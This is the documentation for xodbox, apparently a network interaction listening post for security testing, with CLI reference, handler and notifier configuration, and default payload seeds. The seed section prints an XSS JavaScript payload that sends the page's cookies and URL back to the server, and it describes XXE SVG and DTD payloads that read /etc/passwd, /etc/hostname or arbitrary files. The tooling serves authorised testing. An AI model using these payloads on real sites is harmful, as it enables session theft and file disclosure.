xodbox

Network interaction listening post

Purpose

Quickly determine if an application reaches out to remote network-based services. Easily create custom responses to test how applications consume data from network sources.


Features

Multiple listening protocols:

  • HTTP/HTTPS
  • DNS (WIP not finished)
  • FTP
  • SMTP
  • SMB
  • IMAP
  • POP3
  • SSH

Installation

Download a release from GitHub or use Go Install:

go install github.com/defektive/xodbox@latest

Configuration

./xodbox config -e > xodbox.yaml

Handler Configuration

Configuration information for each Handler is documented alongside its code in the handlers directory.

Notifier Configuration

Configuration information for each Notifier is documented alongside its code in the notifiers directory.


Server Usage

./xodbox

All the magic happens through configuration files in the handlers and notifiers.

Client Usage

When a client makes a connection to xodbox, the logic to respond will be processed by a Handler. Handlers are responsible for seeding their own default data.


Quick Start Guides

Linux

This little snippet will:

  • Download and extract latest release from GitHub.
  • Generate a new config file.
  • Create the static and payload directories used by the config file.

wget -q $(wget -q -O - https://api.github.com/repos/defektive/xodbox/releases/latest | grep -o "https:.*Linux_x86_64\.tar\.gz")
tar -xzvf xodbox*.tar.gz
./xodbox config -e | sed 's/^#\(\s*\(payload\|static\)_dir\)/ \1/g' > xodbox.yaml
mkdir -p static payloads/httpx

Bare metal

./xodbox serve 

Docker

Currently, we do not have any prebuilt Docker containers. However, you can just run a release with an Alpine container.

docker run \
  --rm \
  --expose 80 \
  -v `pwd`:/app \
  --workdir /app \
  -d alpine \
  ./xodbox serve

Feedback

I have an issue or feature request

Sweet! Open an issue to start the conversation.


Wait… I want the old node version

Really? OK, we made a tag just for you.

https://github.com/defektive/xodbox/releases/tag/legacy-nodejs

1 - Xodbox CLI

Xodbox CLI Reference

Synopsis

A network interaction listening post.

  • Quickly determine if an application interacts with network services.
  • Easily create custom responses to interaction requests.

Options

      --config string   Config file path (default "xodbox.yaml")
      --debug           Debug mode
  -h, --help            help for xodbox
      --reset-db        Reset database

Auto generated by spf13/cobra on 26-Feb-2025

1.1 - Completion

Generate completion script

Synopsis

To load completions:

Bash:

source <(xodbox completion bash)

# To load completions for each session, execute once:
# Linux:
xodbox completion bash > /etc/bash_completion.d/xodbox
# macOS:
xodbox completion bash > /usr/local/etc/bash_completion.d/xodbox

Zsh:

# If shell completion is not already enabled in your environment,
# you will need to enable it.  You can execute the following once:
echo "autoload -U compinit; compinit" >> ~/.zshrc

# To load completions for each session, execute once:
xodbox completion zsh > "${fpath[1]}/_xodbox"

# You will need to start a new shell for this setup to take effect.

fish:

xodbox completion fish | source

# To load completions for each session, execute once:
xodbox completion fish > ~/.config/fish/completions/xodbox.fish

PowerShell:

xodbox completion powershell | Out-String | Invoke-Expression

# To load completions for every new session, run:
xodbox completion powershell > xodbox.ps1
# and source this file from your PowerShell profile.

xodbox completion [bash|zsh|fish|powershell]

Options

  -h, --help   help for completion

Options inherited from parent commands

      --config string   Config file path (default "xodbox.yaml")
      --debug           Debug mode
      --reset-db        Reset database

SEE ALSO

  • xodbox - A network interaction listening post

1.2 - Config

generate/print config

Synopsis

generate/print config

xodbox config [flags]

Options

  -h, --help   help for config

Options inherited from parent commands

      --config string   Config file path (default "xodbox.yaml")
      --debug           Debug mode
      --reset-db        Reset database

SEE ALSO

  • xodbox - A network interaction listening post

1.3 - Payload

Manage payloads.

Synopsis

manage payloads.

Options

  -h, --help   help for payload

Options inherited from parent commands

      --config string   Config file path (default "xodbox.yaml")
      --debug           Debug mode
      --reset-db        Reset database


1.4 - Payload Dump

dump payloads.

Synopsis

dump payloads.

xodbox payload dump [flags]

Options

  -h, --help   help for dump

Options inherited from parent commands

      --config string   Config file path (default "xodbox.yaml")
      --debug           Debug mode
      --reset-db        Reset database


1.5 - Serve

Start xodbox server.

Synopsis

Start xodbox server.

xodbox serve [flags]

Options

  -h, --help   help for serve

Options inherited from parent commands

      --config string   Config file path (default "xodbox.yaml")
      --debug           Debug mode
      --reset-db        Reset database

SEE ALSO

  • xodbox - A network interaction listening post

1.6 - Update

Update xodbox to latest version

Synopsis

Update or check for updates. The default update method is to download the latest release from GitHub.

xodbox update [flags]

Examples

# Update to latest version
xodbox update
# Use go install to update
xodbox update -g
# Download from a specific URL
# Not sure why anyone else would need this. I use it for quickly testing builds on different machines.
xodbox update -u http://10.0.0.2:8000/dist/xodbox_darwin_arm64/xodbox

# This is typically used after I run the following:
#	goreleaser release --clean --snapshot
#	python -m http.server

Options

  -C, --check        Check for update
  -f, --force        Force update, even if release is not newer
  -g, --go-install   Use go install instead of downloading release from GitHub
  -h, --help         help for update
  -u, --url string   URL to download from (force implies)

Options inherited from parent commands

      --config string   Config file path (default "xodbox.yaml")
      --debug           Debug mode
      --reset-db        Reset database

SEE ALSO

  • xodbox - A network interaction listening post

2 - Handlers

Interaction handlers

Handlers are services that listen on ports and respond to requests.

2.1 - DNS

DNS Handler

Configuration

Key         Values
handler     Must be DNS
listener    Default :53
default_ip  An IP address. Default will be whatever is detected as the server’s public IP.

2.2 - HTTPX

HTTPX Handler

Purpose

Speak HTTP to other computers you may or may not control….

Configuration

Key                    Values
handler                Must be HTTPX
listener               Default :80
static_dir             Directory to host static files from
payload_dir            Directory to import payloads from
acme_email             Email to use for your ACME account
acme_accept            A dumb way to force you to ensure you agree to the ACME provider’s (most likely Let’s Encrypt) TOS
acme_url               https://acme-staging-v02.api.letsencrypt.org/directory, https://acme-v02.api.letsencrypt.org/directory, or one of these: Certmagic acmeissuer.go
tls_names              Your domains to get TLS certificates for, comma separated. I had to do wildcards first, not sure if that was a staging or dns provider issue.
dns_provider           Currently, namecheap or route53 but we can support anything libdns supports…
dns_provider_api_user  Username for API calls. Only used for namecheap ATM.
dns_provider_api_key   Key for API calls. Only used for namecheap ATM.

Filters

The entire HTTP request is used to match filters. To alert on a specific prefix the following filter would be used.

"(GET|POST|HEAD|DELETE|PUT|PATCH|TRACE) /myPrefix"

This would match:

And would not match:

Additional Information

Things are still being created, documented, and fine-tuned.

New Features

  • Let’s Encrypt Auto Cert
  • Exfil data saver

Legacy Functionality to be implemented.

  • robots.txt
  • unfurly
  • arbitrary json
    • b64
  • redirect
    • b64
  • basic auth
  • breakfastbot
  • allow origin *

Legacy functionality that isn't specific to a handler

  • alert pattern with payload
  • alert pattern (alert patterns are part of notifiers, maybe we need to expose alert patterns based on handler type)
  • slack hook (this is now a notifier)

2.2.1 - Default Payloads Seeds

seed data

Default payloads that come with xodbox.

2.2.1.1 - Default Header

Adds the default header to all HTTP responses.

Adds an HTTP header to all HTTP responses.

Example Request

curl -i http://xodbox.test/

Example Response

Server: BreakfastBot/1.0.0

2.2.1.2 - Redirect

HTTP Redirects

Redirects to the location given in the query parameter l, using the query parameter s as the HTTP status code.

What      Description              GET Parameters
Location  Location to redirect to  l
Status    HTTP status code         s

Example Request

curl -i "http://xodbox.test/redir?l=https://github.com/defektive/xodbox&s=301"

Example Response

Location: https://github.com/defektive/xodbox

2.2.1.3 - Robots TXT

A restrictive robots.txt

Simple robots txt to prevent indexing.

Example Request

curl http://xodbox.test/robots.txt

Example Response

User-Agent: *
Disallow: /

2.2.1.4 - Inspect

Reflect back HTTP requests in various formats

Depends on an internal code

/inspect

Inspect or reflect the request back in various formats.

  • Plain Text (default, .txt)
  • HTML (.html, .html)
  • GIF (.gif)
  • JPEG (.jpg)
  • PNG (.png)
  • MP4 (.mp4)
  • XML (.xml)
  • JSON (.json)
  • JavaScript (.js)

Examples

  • http://localhost/inspect
  • http://localhost/some/random/path/inspect.gif

2.2.1.5 - XSS HTML

Returns HTML that embeds xss-js

/jsc.html

Simple HTML to load simple JS Payload.

2.2.1.6 - XSS JavaScript

Returns JS that embeds an image back to xodbox

/jsc

Simple JS Payload. Useful for embedding or quickly copying and modifying for an XSS payload to prove execution and exfil.

(function (){
    var s = document.createElement("img");
    document.body.appendChild(s);
    s.src="//{{.Request.Host}}/jscb?src="+window.location+"&c="+document.cookie;
})()

2.2.1.7 - Default Favicon

Redirects to the default logo.

Redirects to the embedded default logo, exposed via embedded fs.

Example Request

curl -i http://xodbox.test/favicon.ico

2.2.1.8 - HTML Iframe

HTML page with iframe and image callback

/ht

Iframe callback

2.2.1.9 - Open Graph

Embed request params in open graph elements.

Useful for unfurlers. Maybe we should merge this into inspect…

Example Request

curl -i "http://xodbox.test/unfurl"

Example Response

Location: https://github.com/defektive/xodbox

2.2.1.10 - XXE Callback

More XXE

XXE Callback used by xxe-system

2.2.1.11 - XXE DTD

More XXE

/dt

A vulnerable application for testing is in ../../../../cmd/xodbox-validator

/evil.dtd

dtd for use by others

2.2.1.12 - XXE SVG Hostname

Returns an SVG payload with XXE to get files

/sh

attempts to get /etc/hostname

SVG with XXE payloads

2.2.1.13 - XXE SVG Passwd

Returns an SVG payload with XXE to get files

/sp

attempts to get /etc/passwd

2.2.1.14 - XXE SVG Request Params

Returns an SVG payload with XXE to get files

/sv

Attempts to get whatever file is supplied via the f query parameter.

2.2.1.15 - XXE System

More XXE

/dt

A vulnerable application for testing is in ../../../../cmd/xodbox-validator

2.2.1.16 - Default Page

returns a simple page if nothing is matched

Adds an HTTP header to all HTTP responses.

Example Request

curl -i http://xodbox.test/

Example Response

hi

2.2.1.17 - In Development Seeds

These seeds are not ready for production and may never be.

Seeds that are not tested or finished.

2.2.1.17.1 - WPAD

Returns a WPAD config file (JavaScript).

WPAD Proxy. Not really useful at the moment. Should be more useful in the future.

2.2.2 - Example Payloads

Examples

Default payloads that come with xodbox.

2.2.2.1 - List Payloads

List payloads

List Payloads

---
title: List Payloads
description: List payloads
weight: 1
pattern: /i-forgot-how-things-work$
is_final: true
data:
  headers:
    Content-Type: text/plain
  body: |
    Payloads
    
    {{ range .Payloads }}
    {{ .Pattern }} - {{ .Name }} [{{ .Type }}]
    {{ .Description }}
    
    {{ end }}    
---

3 - Notifiers

Interaction notifiers

Notifiers are used to send notifications to external services or log interactions to the app log.

Filters

Each notifier accepts a filter configuration option, which is compiled into a Go regexp object. What the filter is matched against depends on the type of event. For HTTPX events it is the entire HTTP request. A simple example that matches a specific path prefix:

(GET|POST|HEAD|DELETE|PUT|PATCH|TRACE) /x/

Be sure to check each handler for more information on what its event supplies for filter matching.
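
How the HTTPX filter from the Handlers section and the notifier filter described above behave on whole requests, as an added example that is not part of xodbox: it compiles the page's /myPrefix filter with Go's regexp package and compares it with a stricter variant. The strict pattern, the sample requests, and the assumption that the matched text starts with the request line are this example's own.

```go
package main

import (
	"fmt"
	"regexp"
)

// pageFilter is the filter string shown in the documentation.
// strictFilter is this example's tightened variant (an assumption, not a
// xodbox default): anchored to the request line, ending on a path boundary.
var (
	pageFilter   = regexp.MustCompile(`(GET|POST|HEAD|DELETE|PUT|PATCH|TRACE) /myPrefix`)
	strictFilter = regexp.MustCompile(`^(GET|POST|HEAD|DELETE|PUT|PATCH|TRACE) /myPrefix([/? ]|$)`)
)

// sample is one constructed raw HTTP request (not captured traffic).
type sample struct{ name, raw string }

var samples = []sample{
	{"exact prefix", "GET /myPrefix/cb?id=1 HTTP/1.1\r\nHost: xodbox.test\r\n\r\n"},
	{"longer path segment", "GET /myPrefixed HTTP/1.1\r\nHost: xodbox.test\r\n\r\n"},
	{"other method", "OPTIONS /myPrefix HTTP/1.1\r\nHost: xodbox.test\r\n\r\n"},
	{"prefix only in body", "POST /other HTTP/1.1\r\nHost: xodbox.test\r\n\r\nnote=GET /myPrefix"},
	{"prefix only in header", "GET / HTTP/1.1\r\nX-Note: did a PUT /myPrefix earlier\r\n\r\n"},
}

// Verdict records how both filters treat one request.
type Verdict struct{ Page, Strict bool }

// Evaluate runs both filters against the whole raw request, which is what the
// page says HTTPX events are matched against.
func Evaluate(raw string) Verdict {
	return Verdict{Page: pageFilter.MatchString(raw), Strict: strictFilter.MatchString(raw)}
}

func main() {
	for _, s := range samples {
		v := Evaluate(s.raw)
		fmt.Printf("%-22s page=%-5t strict=%t\n", s.name, v.Page, v.Strict)
	}
}
```

Because the filter is unanchored and runs over the whole request, the same text in a header or body also triggers a notification; anchoring to the request line limits alerts to the path actually requested.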

3.1 - App Log

Log to application log

Structured logging output

time=2025-02-26T14:57:03.838-07:00 level=INFO msg="InteractionEvent received" xodbox.pkg=github.com/defektive/xodbox/pkg/notifiers/app_log details="HTTPX: GET /l/face from 127.0.0.1:56407"

Configuration

Key       Values
notifier  Must be app_log

3.2 - Discord

Discord notification

Discord Notification

Configuration

Key           Values
notifier      Must be discord
url           Webhook URL
author        Username to appear in slack. (optional)
author_image  Emoji code to use for user’s avatar. (optional)
filter        Golang regexp.

3.3 - Slack

Slack notifications

Slack Notification

Configuration

Key           Values
notifier      Must be slack
url           Webhook URL
author        Username to appear in slack. (optional)
author_image  Emoji code to use for user’s avatar. (optional)
channel       Channel to post to, can be a user’s ID. (optional)
filter        Golang regexp.

3.4 - Webhook

Generic HTTP Webhook

Post logic is used by the Slack and Discord webhooks.

4 - xodbox-validator

validate xxe payloads

Purpose

To make sure XXE payloads are executing properly.

Usage

./xodbox-validator